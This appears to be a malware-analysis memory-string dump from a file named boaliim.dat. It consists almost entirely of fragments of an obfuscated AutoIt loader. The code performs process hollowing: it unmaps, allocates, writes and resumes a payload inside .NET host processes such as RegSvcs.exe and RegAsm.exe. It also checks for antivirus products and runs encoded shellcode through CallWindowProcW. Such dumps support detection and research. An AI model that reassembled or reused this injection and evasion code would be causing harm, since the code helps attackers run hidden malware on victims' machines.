Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = fileread(filegetshortname(@scriptdir & "\" & $_y0x3856f9eb36e28b456c771ba794ea0e))9?g
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cc0ceea6516a6b0c = ($_y0x3856f9cc0ceea6516a6b0c)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _reverse($_y0x3856f9dd11d4bc42717c329f)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c711ebad5e41 = stringlen($_y0x3856f9dd11d4bc42717c329f)40t
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ekrn.exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msctf.dllk(
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9e720e1ad536c7b3aa8a6c63956956ba47a4d7cc22b1629~
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: byte inheritedaddressspace;byte readimagefileexecoptions;exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\microsoft.net\framework\v2.0.50727\regasm.exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029xe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user\appdata\local\temp\regsvcs.exeregsvcs.execw
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exel5
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c60fe3be51687b66f4a0 = dllopen("advapi32.dll")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exeenu
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $_y0x3856f9c720edad536c4d3ba38dbb0844917aa4776742c03727
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29exe
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: elseif fileexists($_y0x3856f9c720edad536c4d3ba38eeb3253b8) thend)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c711ebad5e41 < 1 then return seterror(1, 0, "")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _stringbetween($s_string, $s_start, $s_end, $v_case = -1)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $s_end = stringregexpreplace($s_end, $s_pattern_escape, "\\$1")9)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c60df5b1406c5a34b591d6 = $_y0x3856f9cf1ce2bc69[5]orv()
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9f82ff5f10441, 1, "current_user")4q7
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $_y0x3856f9c720edad536c4d3ba38dbd0844917aa4776742c037271
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct"))
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_iswow64process($_y0x3856f9c61ef5a7537d61269f)ktp*
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6toar1049wfld4e75
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l $_y0x3856f9da11e4a0516a610c = dllstructcreate("char[" & $_y0x3856f9c711ebad5e41 + 1 & "]")015
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da11e4a0516a610c, 1, $_y0x3856f9dd11d4bc42717c329f)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf11f5ad4641 = dllcall("msvcrt.dll", "ptr:cdecl", "_strrev", "struct*", $_y0x3856f9da11e4a0516a610c)
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if @error or $_y0x3856f9cf11f5ad4641[0] = 0 then return seterror(2, 0, "")p
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0857846dbb607175 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\regsvcs.exe")g
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0857846da9657f75 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\regasm.exe")~
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbd0844917aa4776742c03727 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v2.0.50727\applaunch.exe")h
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0857846dbb607175 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\regsvcs.exe")c
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0857846da9657f75 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\regasm.exe")
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d3ba38dbb0844917aa4776742c03727 = ($_y0x3856f9db20eeab5f7c770ab190e1334a967991 & "\microsoft.net\framework\v4.0.30319\applaunch.exe")6v
Source: boaliim.dat, 00000007.00000003.428106183.000000000182C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c720edad536c4d21b18ce13c7ad23891 = ($
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c4574770c = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25 & "]")0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da06e2a9547d60269f = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec393615648ea9a741d539c772 & "]", $_y0x3856f9de06c289745d400699b7ca007c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c71deeb255577407a78ecb36518053, $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c718eeba446d73399590f5327ce
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27 = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword pointertorawdata;" & "dword pointertorelocations;" & "dword pointertolinenumbers;" & "word numberofrelocations;" & "word numberoflinenumbers;" & "dword characteristics", $_y0x3856f9de1ee8a15e6c77279f)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c71deeb255577407a78ecb36518053 = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "sizeofrawdata")/
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b = $_y0x3856f9de06c289745d400699b7ca007c + dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "pointertorawdata")$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "virtualaddress")(
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c718eeba446d73399590f5327c = dllstructgetdata($_y0x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27, "unionofvirtualsizeandphysicaladdress")7
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c718eeba446d73399590f5327c and $_y0x3856f9c718eeba446d73399590f5327c < $_y0x3856f9c71deeb255577407a78ecb36518053 then $_y0x3856f9c71deeb255577407a78ecb36518053 = $_y0x3856f9c718eeba446d73399590f5327cq
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata(dllstructcreate("byte[" & $_y0x3856f9c71deeb255577407a78ecb36518053 & "]", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991), 1, dllstructgetdata(dllstructcreate("byte[" & $_y0x3856f9c71deeb255577407a78ecb36518053 & "]", $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b), 1))b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c718eeba446d7339879deb2540927991 <= $_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 and $_y0x3856f9c718eeba446d7339879deb2540927991 + $_y0x3856f9c71deeb255577407a78ecb36518053 > $_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 thenc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da1ce2a45f7b4034b1a0 = dllstructcreate("byte[" & $_y0x3856f9c71deeb2555a7326a3abea3b4a8253 & "]", $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b + ($_y0x3856f9de0fe3ac427d6126889cf81544926f9a737e43c006 - $_y0x3856f9c718eeba446d7339879deb2540927991))b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if $_y0x3856f9c81ce2a45f7b7321a3a0 then _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da1ce2a45f7b4034b1a0, $_y0x3856f9de14e2ba5f487d3ca88dd6, $_y0x3856f9de01f7bc59777c34aab1ea36418478817b734bc61d1f0360a489826b, $_y0x3856f9c703e6af597b4b = 523)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de14e2ba5f487d3ca88dd6, "ptr", $_y0x3856f9de03e8ac4574770c, "dword_ptr", $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25, "dword_ptr*", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201\b
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c70ae2a444794b = $_y0x3856f9de0fe3ac427d6126889cf80e - $_y0x3856f9de0fe3ac427d61268995eb0e
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ci.cataloghint
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s$ci.cataloghint
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft-windows-netfx4-us-oc-package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: omicrosoft-windows-netfx4-us-oc-package~31bf3856ad364e35~amd64~~10.0.17134.1.cat6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002\software\microsoft\windows nt\currentversion
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l $_y0x3856f9da1ec28a69 = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")d
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "readprocessmemory", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da1ec28a69, "imagebaseaddress", $_y0x3856f9de14e2ba5f487d3ca88dd6)f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "e" & "ax", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "rcx", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653),
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $_y0x3856f9c61aefba5579760c, "ptr", dllstructgetptr($_y0x3856f9da0dc886645d4a019f))
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "dword", "resumethread", "handle", $_y0x3856f9c61aefba5579760c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61ef5a7537d61269f)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $_y0x3856f9c61aefba5579760c)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return dllstructgetdata($_y0x3856f9da3ef5a7537d61269990e1314a9367a9627b43cd06, "processid")0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_fixreloc($_y0x3856f9de03e8ac4574770c, $_y0x3856f9da0ae6bc5141, $_y0x3856f9de0fe3ac427d6126889cf80e, $_y0x3856f9de0fe3ac427d61268995eb0e, $_y0x3856f9c807eaa9577d4a63f2a0)#
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c71deeb255777417aa96ec3c7c, $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9da0be9ba597d610c, $_y0x3856f9c70ae6bc5141, $_y0x3856f9da0fe3ac427d61269f
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9c708eba95741 = 3 + 7 * $_y0x3856f9c807eaa9577d4a63f2a0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: while $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8 < $_y0x3856f9c71deeb255410
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029 = dllstructcreate("dword virtualaddress; dword sizeofblock", $_y0x3856f9de0ae6bc5141 + $_y0x3856f9c71ce2a4516c7b23a3b4e02140b8)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c718eeba446d7339879deb2540927991 = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "virtualaddress")"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c71deeb255777417aa96ec3c7c = dllstructgetdata($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029, "sizeofblock")
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f = ($_y0x3856f9c71deeb255777417aa96ec3c7c - 8) / 21
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da0be9ba597d610c = dllstructcreate("word[" & $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f & "]", dllstructgetptr($_y0x3856f9da07ca89775d4d1787aaca0877a44687555378ea103029) + 8)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9c70ae6bc5141 = dllstructgetdata($_y0x3856f9da0be9ba597d610c, 1, $_y0x3856f9c717)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: if bitshift($_y0x3856f9c70ae6bc5141, 12) = $_y0x3856f9c708eba95741 then,
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9da0fe3ac427d61269f = dllstructcreate("ptr", $_y0x3856f9de03e8ac4574770c + $_y0x3856f9c718eeba446d7339879deb2540927991 + bitand($_y0x3856f9c70ae6bc5141, 0xfff))"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllstructsetdata($_y0x3856f9da0fe3ac427d61269f, 1, dllstructgetdata($_y0x3856f9da0fe3ac427d61269f, 1) + $_y0x3856f9c70ae2a444794b)"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_allocateexespaceataddress($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f, $_y0x3856f9c71deeb25541):
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x1000, "dword", 64)9
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_allocateexespace($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9c71deeb25541)3
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "ptr", "virtualallocex", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", 0, "dword_ptr", $_y0x3856f9c71deeb25541, "dword", 0x3000, "dword", 64)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif"
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: next)
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endifr
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfuncu
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc`
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func _runbinary_unmapviewofsection($_y0x3856f9c61ef5a7537d61269f, $_y0x3856f9de0fe3ac427d61269f)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dllcall("ntdll.dll", "int", "ntunmapviewofsection", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de0fe3ac427d61269f)p
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "iswow64process", "handle", $_y0x3856f9c61ef5a7537d61269f, "bool*", 0)`
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")\
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"&
